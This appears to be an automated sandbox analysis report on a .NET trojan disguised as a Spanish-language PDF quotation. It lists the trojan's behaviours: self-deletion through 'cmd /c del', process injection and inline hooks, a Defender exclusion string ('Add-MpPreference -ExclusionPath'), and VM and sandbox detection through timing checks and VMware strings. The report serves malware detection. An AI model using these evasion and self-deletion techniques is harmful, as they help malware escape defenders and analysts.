          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Solicitud urgente de Quotaion_U1197,pdf.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@3/3
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Solicitud urgente de Quotaion_U1197,pdf.exe.f20000.0.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Solicitud urgente de Quotaion_U1197,pdf.exe.f20000.0.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.2.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.1.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.3.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.0.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.0.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.1.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.5.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.2.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.7.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.0.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.9.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.3.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.1.unpack, S6/xq.cs.Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 0_2_018FE110 push eax; retn 0577h
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041783B push cs; retf
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041794C push ebx; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00416939 push 8A1A9327h; iretd
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0040E328 push 3E78F232h; iretd
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_004163FF push esi; iretd
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0041D50B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0465D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013783B push cs; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00136939 push 8A1A9327h; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013794C push ebx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0012E328 push 3E78F232h; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013DBDE push ebx; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_001363FF push esi; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013D502 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013D50B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0013D56C push eax; ret
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: 0xD47F48BF [Mon Dec 21 20:44:47 2082 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.76378455521

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE7
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.Solicitud urgente de Quotaion_U1197,pdf.exe.3321c04.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Solicitud urgente de Quotaion_U1197,pdf.exe PID: 6204, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000129B7E second address: 0000000000129B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe TID: 5128Thread sleep time: -36039s >= -30000s
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe TID: 4060Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6480Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeThread delayed: delay time: 36039
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeThread delayed: delay time: 922337203685477
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.333883657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.312931928.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000007.00000000.333883657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000007.00000000.346806306.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.346806306.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000007.00000000.333883657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04643D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04683540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046B3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04627D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0468A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04602D8A mov eax, dword ptr fs:[00000030h]
